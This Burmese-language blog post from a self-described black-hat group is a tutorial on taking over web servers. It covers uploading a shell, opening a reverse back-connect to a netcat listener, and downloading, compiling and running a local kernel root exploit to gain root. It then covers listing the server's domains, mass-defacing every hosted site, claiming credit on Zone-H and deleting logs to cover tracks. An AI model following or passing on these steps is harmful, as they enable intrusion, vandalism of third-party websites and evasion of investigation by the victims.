+++++ Dear ….. Thank you for visiting our booth at the Myanmar Black Hacking. We hope you will have a good time and enjoyed your visit to Underground. In case we won't answer some of your questions about our Real Info, we encourage you to visit our website at www.myanmarblackhacking.com +++++ It will give you a good idea of what we can do for +++++

Mar 30, 2015

0 What is Rooting?

 
What is Root ?
Root ဆိုတာဘာလဲ?
Root ဆိုတာက.တစ္ကယ္ေတာ႕.server ေတြမွာ..Administrator Access ရေအာင္လုပ္ၿခင္းပါဘဲ..။ server တစ္ခုမွာ.ကၽြန္ေတာ္က.root access ရသြားၿပီဆိုပါေတာ႕ဗ်ာ..အဲ႕ဒါဆိုရင္.အဲ႕.server ၾကီးမွာ.ရွိေနတဲ႕.Data ေတြ.files ေတြကို.copy ဒါမွမဟုတ္.delete လုပ္လို႕ရသြားၿခင္းပါ.။ ကဲ႕ဒီေလာက္ဆိုရင္..Hacker ေတြ.ဘာလို႕root access လုပ္ၾကတယ္.root access ကဘယ္ေလာက္အေရးၾကီးတယ္ဆိုတာ.ကိုသိေလာက္ပါၿပီထင္ပါတယ္ေနာ္.။

What is Rooting?

Rooting ဆိုုတာကိုု Security နယ္ပယ္ဘက္ကၾကည့္ျပီးေျပာမယ္ဆုုိရင္ server ကိုု remote ကေန admin access ရေအာင္ေဆာင္ရြက္ျခင္းပါ ။

Rooting Tutorial

Website တစ္ခုုေပၚကိုု shell  တစ္ခုုရေအာင္ တင္ႏုုိင္သြားျပီဆိုုပါစိုု ႕ ဒါဆိုု ကၽြြန္ေတာ္တိုု႕ အဲ့ဒီ့ shell ကတစ္ဆင့္ Server ၾကီးတစ္ခုုလံုုးကိုု ထိန္းခ်ဳပ္မယ္ ။ Local Root ေပါ့ေနာ္ . အဲ့လိုုလုုပ္ဖိုု႕ ဘာေတြလိုုမလဲဆိုုတဲ့ Tutorial ေလးပါ

Basic Theory

အဲ႕ဒါနဲ႕.root access ရေအာင္.အဲ႕.Shell နဲ႕ၿပန္ connect လုပ္ၿပီး..local root access ရေအာင္လုပ္ၿခင္းပါ.ပဲဗ်ာ.။ဒါကေတာ႕.အရုိးရွင္းဆုံး.နည္းလမ္းတစ္ခုပါ.အခုလက္ရွိ.attacker ေတာ္ေတာ္မ်ားမ်ားလက္ေတြ႕အသုံးၿပဳမ်ားဆု့့ံး..
နဲ႕.အရုိးစဥ္းဆုံးေသာ.Theory တစ္ခုဆိုလဲမမွားဘူးေပါ႕ဗ်ာ..။

ပထမဆုံး.local root access နဲ႕.တုိက္ခိုက္ေတာ႕မယ္လို႕.နည္းလမ္းေရြးခ်ယ္လိုက္ၿပီဆိုရင္.ခင္ဗ်ားအေနနဲ႕သိထားရမွာပါ..ခင္ဗ်ားရဲ႕.Target server ဟာ.ဘယ္ Kernel version ကိုသုံးထားတယ္ဆိုတာပါပဲ.။ဒါေပမယ္႕ဒါကမခက္ပါဘူး.ခင္ဗ်ားတင္လိုက္တဲ႕ Shell ကေနတဆင္႕သိနိုင္ပါတယ္.။
ဥပမာ…

 Linux 2.6.18 194 ,el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010 86_ 64
 
ဆိုပါေတာ႕ဗ်ာ..
အဲ႕ဒါဆိုရင္.ခင္ဗ်ားTarget server ရဲ႕ kernel version က..2.6.18 ပါ.. 2010 ေပါ႕ဗ်ာ..။ေနာက္ၿပီး.shell မွာ.ရုိက္ရမယ္႕.command က.
uname –a
ေပါ႕ဗ်ာ…..။

Finding Local Root Exploit

Local root exploit ကိုဘယ္လိုရွာမလဲဆိုေတာ႕.ၾကိဳက္သလိုရွာနုိင္တယ္..။ Google မွာ..ခုနတုန္းကခင္ဗ်ားရွာလို႕ရထားတဲ႕..kernel version ကိုရုိက္ၿပီးေတာ႕.ရွာမယ္.ေပါ႕ဗ်ာ..အင္းရွႈင္းေအာင္ေၿပာရမယ္ဆိုရင္..Google search မွာ. Local root 2.6.18 2010 ေပါ႕ဗ်ာ..အဲလိုေၿပာတာပါ.ဗ်ာ.:-D
ေနာက္ၿပီး..security website ေတြေနၿပီးေတာ႕လည္းရွာနုိင္တယ္.ဥပမာ.Exploit –DB .com လိုဟာမ်ိဳးေပါ႕ဗ်ာ..
ေနာက္တစ္နည္းကေတာ႕..injector ကိုသုံးၿပီးေတာ႕.ရွာတာပါပဲ.။Attacker ေတြအေနနဲ႕..မိမိ အဆင္ေၿပမယ္႕.Method ကိုသုံးၿပီးေတာ႕ရွာနိုင္ပါတယ္..။ကိုယ္သန္ရာသန္ရာကိုေပါ႔ဗ်ာ..
အင္း.local root expliot ရွာတယ္ဆိုမွေၿပာရဦးမယ္.Local root မွာ ၂မ်ိဳးရွိတယ္..
  1. Local c: not ready to use. နဲ႕.
  2. local : ready to use. ပါပဲ
သေဘာကေတာ့ဗ်ာ.အသင္႕စားသုံးနုို္င္ေသာ.rootနဲ႕.နည္းနည္းၿပန္ခ်က္ဖို႕လိုေသးတဲ႕.root ေပါ႕ဗ်ာ
။ေကာင္းပါၿ႔ပီး..ကၽြန္ေတာ္ေနာက္ေတာ႕မွ..အသင္႕စားသုံးနုိင္ေအာင္..အဲဟုတ္ေပါင္..Local c ကေန..local ( ready to use ) ၿဖစ္ေအာင္ဘယ္လိုလုပ္ရတယ္ဆိုတာကိုရွင္းၿပပါေတာ႕မယ္..အခုေတာ႕.ေရွ႕ဆက္ရေအာင္ ။

Backconnect

Server တစ္ခုေပၚမွာ.root access ရဖို႕ဆိုရင္.ခင္ဗ်ားအဲ႕.server ေပၚမွာ.Back connet လို႕ေခၚတဲ႕Shell ရွိမွရမယ္..ေနာ္.။
( BackConnect ဆိုုတာ ခ်ိတ္ထားတဲ့ server နဲ႕ကိုုယ့္စက္ လမ္းေၾကာင္းကိုုဆိုုလိုုခ်င္တာပါ )

ပုံမွာၿပထားတဲ႕အတုိင္း.connect လုပ္နည္းေလးကိုေၿပာမယ္ေနာ္..
  1.  ip .သင္႕ရဲ႕.IP ကိုထည္႕ပါ.။
  2.   port ကိုၿဖည္႕ပါ.။
  3. Perl ပဲထားလိုက္ပါ.။
  4. ေနာက္ေတာ႕.connect လိုက္ေပါ႕ဗ်ာ..
အင္းအဲ႕လို.connect လိုက္ၿပီဆိုရင္ေတာ႕..သူ႕ဆီက.data ေတြကိုၿပန္လက္ခံဖို႕.ခင္ဗ်ားမွာ tool တစ္ခုေတာ႕လိုမယ္ထင္တယ္ဗ်ာ..။
netcat ေလ.သိတယ္မွတ္လား။အဲဒါကိုမရွိေသးရင္. Google မွာရွာၿပီးေတာ႕down လိုက္ေပါ႕ဗ်ာ.
အင္းဒီေနရာမွာေၿပာခ်င္တာတစ္ခုက..ခင္ဗ်ားလက္ရွိသုံးေနတဲ႕.OS က.window လား.Linux လားဆိုတာပါပဲ..။ကၽြန္ေတာ္ကေတာ႕.WINDOW ကိုပဲေၿပာသြားမယ္ေနာ္..။Linux နဲ႕လည္းအတူတူပဲမို႕လုိ႕ပါ။ေအာ္ေၿပာခ်င္တာက..window user ဆိုရင္. CMD ကို.ဖြင္႕လို႕..၊အင္း.linux user ဆိုရင္ေတာ႕.terminal ကိုဖြင္႕ေပါဗ်ာ

Netcat ကိုရရင္ vlp 433 လို႕ရုိုက္လို္က္ပါေနာ္.။ ။ေသခ်ာရွင္းေအာင္ေၿပာရမယ္ဆိုရင္..
  1.   Press nc -vlp 433
  2.   Wget [the link of the local-Root.zip]
  3.   unzip local-Root.zip
  4.   chmod 777 local.c
အေပၚကအတုုိင္း Command ေတြရိုုက္လိုုက္ပါ ။အဲ႕ေနာက္မွာ. ၿဖစ္ၿပီးသားဆိုရင္ေတာ႕ၿပသနာသိပ္မရွိဘူးေပါ႕ဗ်ာ..။အဲဒါေပမယ္.႕.အခ်က္မၿပဳတ္ရေသးတဲ႕..(local:C ) လိုဟာမ်ိဳးက်ေတာ႕ၿပန္ေၿပာင္းေပးဖို႕လိုၿပီေလ.။ဒီေနရာမွာဘယ္လိုလုပ္ရတယ္ဆိုတာကိုေၿပာၿပီးေနာ္။ ေစာနတုန္းကကၽြန္ေတာ္ေၿပာခဲ႕သလိုဘဲ..ready to use (local ) မွာ commad ေလးေလာက္ေတာ႕ရိုက္ရံုုနဲ႕အဆင္ေျပသြားတယ္ေလ …။ ရိုက္ရမွာက..
gcc local.c -o local
ပဲေနာ္.။ဒါဆိုရင္.ခုနက.local:c ၾကီးက.local ကိုေၿပာင္းသြားပါၿပီး.။လြယ္တယ္ေနာ္.။
ေနာက္ၿပီး..
chmod 777 local
ရယ္.ေနာက္ၿပီး.
 ./local
ရိုက္ပါ.အဲ႕ဒါမွ.ခင္ဗ်ားရဲ႕.local root က.အလုပ္လုပ္မွာေပါ႕.ဗ်ာ.။အင္းေနာက္ၿပီးရုိုက္ကမွာက..
su
ေနာ္.အဲ႕ဒါဆိုရင္ေတာ႕ခင္ဗ်ားရဲ႕.ID ကိုၿမင္ရပါလိမ္႕မယ္.ေသခ်ာရွင္းေအာင္ေၿပာမယ္ဆိုရင္ေတာ႕.
  1.   gcc local.c -o local
  2. chmod 777 local
  3. ./local to local root work
  4.   su

အဲ႕လိုေနာ္ ID မွာၿမင္ရမယ္႕ပုံစံက..
 uid=0(root) gid=0(root) groups=0(root).
အဲ႕တုိင္းေနာ္.။
ကဲအခုဆက္ၿပီးေတာ႕..Server ကို Root လုပ္ၿပီးရင္ဘာၿဖစ္တယ္ဆိုတာကိုဆက္ေၿပာပါ့မယ္ ။
 
 

The Withdrawel of Domain ?

Withdrawel of domain ဆိုတာကေတာ႕…ကၽြန္ေတာ္တို႕ရဲ႕.Target server မွ.Domain name အားလုံးကိုသိေအာင္လုပ္ျခင္းပါ ။အဲကလိုလုပ္ဖို႕နည္းလမ္း၂.မ်ိဳးရွိတယ္..။
ပထမဆုံး..whois.domaintools.com မွာ.register လုပ္ဖို႕လိုမယ္.။အင္းၿပီးရင္ေတာ႕.ထုံးစံအတုိင္း..login မွာေပါ႕.ေနာ္…။ၿပီးရင္ေတာ႕.Target server ရဲ႕ IP ကိုထည္႕ရပါမယ္…။ခင္ဗ်ားက.server ရဲ႕ IP ကိုမသိေသးဘုူူး…ဟုတ္လား?..မခက္ပါဘူး.လြယ္ပါတယ္..။အရင္ဆုံး CMD ကိုသြားလုိက္.
CMD > Ping websitename .com အဲ႕တိုင္းရိုက္လိုက္.ပါ..။ဒါဆိုရင္.ေတာ႕.သူ႕ရဲ႕.IP ကိုၿမင္ရပါလိမ္႕မယ္.ေနာ္.။ IP [XX.XX.XX.XX] ဘာညာေပါ႕ဗ်ာ..။Ok တယ္ေနာ္…။ဒါေပမယ္႕တစ္ခါတစ္ေလမွ.တစ္ခ်ိဳ႕.website ေတြက.ခင္ဗ်ားကို.သူ႕ရဲ႕ server မွာရွိတဲ႕.Website.name ေတြကို.ေဖာ္ၿပထားေလ႕မရွိတဲ႕.အခါမွာ.ကၽြန္ေတာ္တို႕.second method ကိုေရြ႕ဖို႕လိုလာၿပီေလ.။အင္း.second method ဆိုတာက.server ေပၚမွာရွိတဲ႕ ဖိုင္ေတြကို.ေမႊေႏွာက္ရွာၿပီး..website name ေတြကိုရွာမယ္ေလ..ဟုတ္ဘူးလား.။အဲ႕အခ်ိန္မွာ.ခင္ဗ်ားတင္လိုက္တဲ႕ shell ကိုၿပန္သုံးဖို႕လုိလာၿပီေလ.။shell ကိုေခၚ..ၿပီး.ေတာ႕.
ls –la /etc/valiases
ဒါမွ.မဟုတ္.
ls/ver/named
ကိုရုိက္လိုက္ေနာ္..ဒါဆိုရင္ေတာ႕.domain name ကိုသိဖို႕အဆင္ေၿပေလာက္ၿပီထင္ပါတယ္…။


Message Deface?

Message deface ဆိုတာ.က.server ေပၚမွာရွိတဲဲ့ site အားလံုုးကိုု တျပိဳင္တည္း Deface လုုပ္ပစ္ျခင္းပါ

 

Register to Zone-H ?

Zone-H ဆိုတာကေတာ႕..Hack ၿပီးသား website ေတြကို.ကိုယ္႕နာမည္..ဒါမွမဟုတ္..အဖြဲ႕နာမည္နဲ႕.register လုပ္နုိင္တဲ႕.website တစ္ခုၿဖစ္ပါတယ္.။အင္း.အဲ႕.Zone-H ဆိုတဲ႕.သူကလည္း.ခင္ဗ်ားတို႕.register လုပ္သမွ်ကို.list လုပ္ထားေပးပါတယ္..။ေၿပာခ်င္တာကေတာ႕..အဲ႕ေပၚမွာ..တက္ၿပီးေတာ႕ေၾကၿငာနုိင္တာေပါ႕ဗ်ာ..။Professional Hacker ၾကီးေတြက..သူတို႕ဘာေတြလုပ္တယ္..ဘယ္.Website ေတြကို.Hack လုိက္တယ္.ဘယ္သူ႕ကိုေတာ႕..Deface ခ်လိုက္တယ္.စသည္ၿဖင္႕..ေပါ႕ဗ်ာ..အဲ႕ Zone-H ဆိုတဲ႕.site ေပၚမွာ.ေဖာ္ၿပေလ႕ရွိတာေပါ႕..ဒါပါပဲ။

Clear the Tracks ?

အင္း.အဲ႕ဒါက.အေရးၾကီးဆုံးပါပဲ..။ဘာလို႕လဲဆိုေတာ႕..server ေပၚမွာ.ကိုဘာေတြလုပ္ခဲ႕တယ္.ဘယ္လို tool ေတြသုံးခဲ႕တယ္ဆိုတာကို..ေၿခာရာခံလို႕မရေအာင္.သဲလြန္စမက်န္ေအာင္ေဖ်ာက္တာေပါ႕ဗ်ာ..ရွင္းတာပဲ..။ဘာလို႕လုပ္ဖို႕လိုသလဲဆိုတဲ႕ေမးခြန္းကိုေၿဖဖို႕ဆိုရင္ေတာ႕..ခင္ဗ်ား..website တစ္ခုကို Hack ေနတဲ႕.အခ်ိန္မွာ..ခင္ဗ်ားရဲ႕..CMD ေတြ.IP address ေတြကို.လုိက္မွတ္ထားတဲ႕ LOG ဆိုတဲ႕ file ေလးေတြရွိေလရဲ႕..။အဲ႕ဖိုင္ေတြကို.webmaster ကမေတြ႕နုိင္ေအာင္လို႕.ၿပန္ဖ်တ္ထားဖို႕လိုတယ္ေလဗ်ာ.ဟုတ္ဘူးလား.။ဒါမွ.ေၿခရာလက္ရာ.မက်န္မွာေပါ႕..။
အင္းဘယ္လိုဖ်တ္ရလဲဆိုလို႕ရွိရင္ေတာ႕..တစ္ခ်ုိဳ႕.ဆရာၾကီးေတြကေတာ႕ဗ်ာ..automatically delete လုပ္နုိင္တဲ႕.program လိုု. Java script ေလးေတြကိုသုံးၿပီး..delete log ကုိလုပ္ၾကတယ္ဗ်.။အင္းအဲ႕လို.tool ေလးကို သာသုံးလိုက္မယ္ဆိုရင္.ေတာ႕..ခင္ဗ်ား.deface တင္ၿပီးတာနဲ႕တင္.ပဲ..auto log delete လုပ္သြားပါလိမ္႕မယ္..။ 

0 comments:

Post a Comment